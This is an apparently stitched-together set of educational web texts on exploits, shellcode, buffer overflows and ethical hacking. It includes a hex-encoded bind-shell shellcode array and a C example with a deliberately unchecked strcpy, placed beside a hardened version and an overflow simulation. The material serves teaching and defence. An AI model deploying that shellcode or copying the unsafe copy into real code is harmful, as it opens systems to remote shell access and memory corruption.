
What does exploit mean?

An exploit is the use of software, data, or commands to take advantage of ("exploit") a weakness in a computer system or program in order to carry out some form of malicious intent, such as a denial-of-service attack or the delivery of a Trojan horse, worm or virus. The weakness can be a bug, a glitch or simply a design flaw. A remote exploit attacks the vulnerability over the network without any prior access to the system. A local exploit needs prior access to the vulnerable system and usually involves raising the privileges of the user account that runs it (privilege escalation). Those who use exploits often combine them with social engineering to obtain the credentials or other information needed to reach the target. Many crackers (often called hackers) take pride in their knowledge of software exploits and post them to websites to share them, or to boast, with other crackers. Web browsers and media players are frequent targets because they both process untrusted data downloaded from the internet and have access to system resources. Patches (or "fixes") are intended to remedy these vulnerabilities as soon as they are revealed and are usually distributed in software updates; hence it is vital to keep your software up to date so that all known vulnerabilities are patched. A zero-day exploit is one that targets a vulnerability for which the software's creator has not yet released a patch, often because the vendor does not yet know of it. Patching cannot help against a zero-day, so to avoid losing data to an attack that takes advantage of an exploit it is a good idea to keep regular backups of your data, stored where a compromised machine cannot reach them (an offline or off-site copy, not only a copy on the same computer).

Shellcode

Shellcode is a set of instructions, usually written in assembly language and then assembled into opcodes (a sequence of byte values, commonly written in hexadecimal), that is injected into the stack (or heap) of a running program so that the machine on which it resides executes the operation the attacker has programmed.

Shellcode is malicious program code that is injected covertly into a computer. The term originated from code that activates a command shell in order to exploit the computer (see command processor), but may refer to any machine language embedded in data that is used to compromise either the local machine or a remote machine. "English shellcode" (Mason, Small, Monrose and MacManus, CCS 2009) goes further: the bytes of the machine code are chosen so that the whole payload also reads as ordinary English text, and when executed that text-shaped code decodes and runs the real payload, which defeats detectors that look for byte sequences that do not resemble text. See shell script.

shell script

A file of executable Unix commands that is created in a text editor. When the file is run, each
command is executed until the end of the file is reached. After the shell script is written, it is made
usable by changing its file status to "executable" with the Unix chmod (change mode) command
(see chmod).

Shell scripts are the Unix counterpart to Windows scripts and Windows/DOS batch files.
See Windows Script Host, PowerShell and batch file abc's.

How Shellcodes Work
by Peter Mikhalenko
05/18/2006 

It is not an easy task to find a vulnerable service and an exploit for it. Nor is it easy, if you are a system administrator, to defend against users who might want to exploit your system. Writing an exploit yourself, turning a one-line bug-tracker entry into a working lockpick, is much more difficult still. This article is not a guide to writing exploits, nor an overview of popular vulnerabilities. It is a step-by-step guide to developing a shellcode, the crucial component of any exploit. Hopefully, learning how shellcodes work will help conscientious and respectable developers and system administrators understand how attackers think and defend their systems against them.

How an Exploit Works

Take any exploit downloaded from the internet that promises you an easy root shell on a remote machine, and examine its source code. Find the most unintelligible piece of the code; it will be there, for sure. Most probably you will find several lines of strange, seemingly unrelated symbols, something like this:

char shellcode[] =
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8a"
"\xd4\xf2\xe7\x83\xeb\xfc\xe2\xf4\xbb\x0f\xa1\xa4\xd9\xbe\xf0\x8d"
"\xec\x8c\x6b\x6e\x6b\x19\x72\x71\xc9\x86\x94\x8f\x9b\x88\x94\xb4"
"\x03\x35\x98\x81\xd2\x84\xa3\xb1\x03\x35\x3f\x67\x3a\xb2\x23\x04"
"\x47\x54\xa0\xb5\xdc\x97\x7b\x06\x3a\xb2\x3f\x67\x19\xbe\xf0\xbe"
"\x3a\xeb\x3f\x67\xc3\xad\x0b\x57\x81\x86\x9a\xc8\xa5\xa7\x9a\x8f"
"\xa5\xb6\x9b\x89\x03\x37\xa0\xb4\x03\x35\x3f\x67";

This is shellcode, sometimes loosely called "bytecode" (it is native machine code, not the bytecode of a virtual machine). Its content is neither a magic word nor random symbols: it is a sequence of low-level machine instructions, the same kind found in an executable file. This example shellcode listens on port 4444 on a Linux box and attaches a Bourne shell to whoever connects; the shell runs with the privileges of the exploited process, so if the vulnerable service runs as root, the attacker gets a root shell. With a shellcode you can also reboot a system, send a file by email, etc. The main task of an exploit program is therefore to make this shellcode run.

Take, for example, the widely known buffer overflow bug. Developers often fail to check the data that a function receives as input. A simple example: the developer declares a fixed array of 100 bytes on the stack and does not check how many bytes are actually written into it. Everything written past the end of the array lands in the adjacent stack memory, which holds other local variables, the saved frame pointer and the function's return address, and a so-called buffer overflow occurs. An exploit's task is to overflow the buffer and, in doing so, overwrite the saved return address with the address of the shellcode. When the function returns, the CPU jumps to the shellcode instead of back to the caller, and the shellcode runs. It's pretty simple.
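The bug and its fix side by side, as an added example that is not from the article. The first function is the unchecked copy just described; the second rejects input that does not fit instead of truncating it silently. The `struct frame` is a constructed model of the stack layout (buffer, then return-address slot): a real frame also has a saved frame pointer and alignment padding in between, so the exact offset is found with a debugger and a cyclic pattern, but the model shows why the payload must land on exactly the right offset, and it does so without undefined behaviour because the whole struct is written as one object.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 100

/* The bug as described: a fixed 100-byte buffer filled with no length check. */
int handle_request_unsafe(const char *input)
{
    char buf[BUF_LEN];
    strcpy(buf, input);            /* input of 100+ bytes runs off the end of buf */
    return (int)strlen(buf);
}

/* Hardened: measure first and refuse anything that does not fit, rather than
 * silently truncating (which hides the problem and creates its own bugs). */
int handle_request_safe(const char *input)
{
    char buf[BUF_LEN];
    const char *end = memchr(input, '\0', BUF_LEN);
    if (end == NULL)
        return -1;                 /* no terminator within 100 bytes: reject */
    size_t n = (size_t)(end - input);
    memcpy(buf, input, n + 1);
    return (int)n;
}

/* Constructed over-long input (120 'A's), the kind an exploit would send. */
const char *overlong_input(void)
{
    static char s[121];
    memset(s, 'A', 120);
    s[120] = '\0';
    return s;
}

/* Model of what sits on the stack while the unsafe function runs. */
struct frame {
    char      buf[BUF_LEN];        /* the 100-byte array the developer allocated */
    uintptr_t saved_ret;           /* where the CPU jumps when the function returns */
};

size_t return_slot_offset(void)
{
    return offsetof(struct frame, saved_ret);
}

/* Attacker's payload = `fill` filler bytes followed by the address they want
 * jumped to. Returns whatever ends up in the return-address slot after the
 * unchecked copy: the legitimate value if the payload fell short, the
 * attacker's value if `fill` matched the slot's offset. */
uintptr_t simulate_overflow(size_t fill, uintptr_t fake_ret)
{
    const uintptr_t legitimate_ret = 0x1000;   /* pretend caller address */
    struct frame f;
    unsigned char payload[sizeof f];

    if (fill + sizeof fake_ret > sizeof f)
        return 0;                               /* payload does not fit the model */
    memset(payload, 'A', sizeof payload);
    memcpy(payload + fill, &fake_ret, sizeof fake_ret);

    f.saved_ret = legitimate_ret;
    memcpy(&f, payload, fill + sizeof fake_ret); /* the unchecked copy */
    return f.saved_ret;
}

int main(void)
{
    printf("safe copy of \"hello\": %d\n", handle_request_safe("hello"));
    printf("safe copy of 120 bytes: %d (rejected)\n", handle_request_safe(overlong_input()));
    printf("return slot is at offset %zu\n", return_slot_offset());
    printf("payload too short -> slot = %#lx\n",
           (unsigned long)simulate_overflow(50, 0xdeadbeef));
    printf("payload on target -> slot = %#lx\n",
           (unsigned long)simulate_overflow(return_slot_offset(), 0xdeadbeef));
    return 0;
}
```

Note that the hardened version returns an error rather than using strncpy: a copy that silently drops the terminator or the tail of the input is a second class of bug, and an explicit rejection is what the caller can act on. Compiling with stack protectors (`-fstack-protector-strong`) and running under ASLR and a non-executable stack does not fix the unsafe function, it only makes the overwritten return address harder to use.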

As I already said, this article is not a guide to writing exploits. There are many repositories of existing shellcodes (shellcode.org, Metasploit); however, they are not always enough. A shellcode is a low-level sequence of machine instructions closely tied to a particular processor architecture and operating system. This is why understanding how it works can help prevent intrusions into your environment.

What Is It For?

To follow along, I expect you to have at least minimal assembly knowledge. As the platform for experiments I chose Linux on a 32-bit x86 processor. Most exploits are intended for Unix services, so they are of most interest. You need a few additional tools: the Netwide Assembler (nasm), its disassembler ndisasm, and hexdump. Most Linux distributions include these by default.

Shellcode is basically a list of carefully crafted instructions that can be executed once the code is injected into a running application. Stack- and heap-based buffer overflows are the most popular way of doing so.

The term shellcode literally refers to written code that starts a command shell. The most common shellcode instruction is to execute a shell such as /bin/sh, or cmd.exe. The only possible reason for launching such commands is to take control or exploit a compromised machine.

So to answer your question: yes, shellcode is always considered exploit code.

Nowadays, shellcode refers to any byte code that can be inserted into an exploit to accomplish a particular objective. Other common shellcode objectives include adding a root user account to a system, or performing a reverse telnet back to the attacker's machine.

Most people think hackers have extraordinary skill and knowledge that allow them to break into computer systems and find valuable information.

In the cyber security world, a person who is able to discover a weakness in a system and manages to exploit it to accomplish a goal is referred to as a hacker, and the process is referred to as hacking. Nowadays people have started to think that hacking is only hijacking Facebook accounts or defacing websites. Yes, that is also part of the hacking field, but it is not the main part.

Who is a Hacker?

In the original student slang, a "hacker" is the opposite of the diligent student: someone who never goes to class, who in fact sleeps all day, and who spends the night pursuing recreational activities rather than studying textbooks.

Let's go through the different kinds of hackers that exist in the cyber security world.
Script Kiddie: Script kiddies are people who use tools, scripts, methods and programs created by real hackers. In simple words, someone who does not know how a system works but is still able to exploit it with previously available tools.

White Hat Hacker: White hat hackers are the good guys, who do hacking for defense. The main aim of a white hat hacker is to improve the security of a system by finding security flaws and fixing them. They work for an organization or individually to make cyberspace more secure. Break The Security concentrates only on white-hat hacking and helps you learn the ethical hacking world.

Black Hat Hacker: Black hat hackers are the really bad guys, cyber criminals who have malicious intent. Hackers who steal money, infect systems with malware, etc. are referred to as black hat hackers. They use their hacking skills for illegal purposes.

Grey Hat Hacker: Hackers who may work offensively or defensively, depending on the situation. They do not have malicious intentions but still like to break into third-party systems for fun, or just to show that a vulnerability exists.

Hacktivists: Hackers who use their hacking skills to protest against injustice, attacking target systems and websites to bring about what they see as justice. Well-known hacktivist groups include Anonymous and RedHack.

What is Ethical Hacking?

Ethical hacking, also known as penetration testing or white-hat hacking, involves the same tools, tricks and techniques that hackers use, but with one major difference: ethical hacking is legal, because it is performed with the target's permission. The intent of ethical hacking is to discover vulnerabilities from a hacker's viewpoint so that systems can be better secured. It is part of an overall information risk management program that allows for ongoing security improvements. Ethical hacking can also verify that a vendor's claims about the security of its products are legitimate.

Purpose of Ethical Hacking & its Skill Set!!

When I tell people that I am an ethical hacker, I usually hear snickers and comments like "Hacker (danger)." Many people ask, "Can hacking be ethical?" Yes! That best describes what I do as a security professional. I use the same software tools and techniques as malicious hackers to find the security weaknesses in computer networks and systems. Then I apply the necessary fix or patch to prevent a malicious hacker from gaining access to the data. This is a never-ending cycle, as new weaknesses are constantly being discovered in computer systems and patches are created by the software vendors to mitigate the risk of attack.

Ethical hackers are usually security professionals or network penetration testers who use their hacking skills and toolsets for defensive and protective purposes. Ethical hackers who are security professionals test their network and systems security for vulnerabilities using the same tools that a hacker might use to compromise the network. Any computer professional can learn the skills of ethical hacking.

Goals of the Ethical Hacker

Whether perpetrated by an ethical hacker or a malicious hacker, all attacks are an attempt to breach computer system security. Security consists of four basic elements:

Confidentiality
Authenticity
Integrity
Availability

SKILL SETS

Ethical hackers who stay a step ahead of malicious hackers must be computer systems experts who are very knowledgeable about computer programming, networking and operating systems. In-depth knowledge of the most targeted platforms (such as Windows, Unix and Linux) is also a requirement. Patience, persistence and immense perseverance are important qualities for ethical hackers, because of the length of time and level of concentration required for most attacks to pay off. Networking, web programming and database skills are all useful in performing ethical hacking and vulnerability testing.
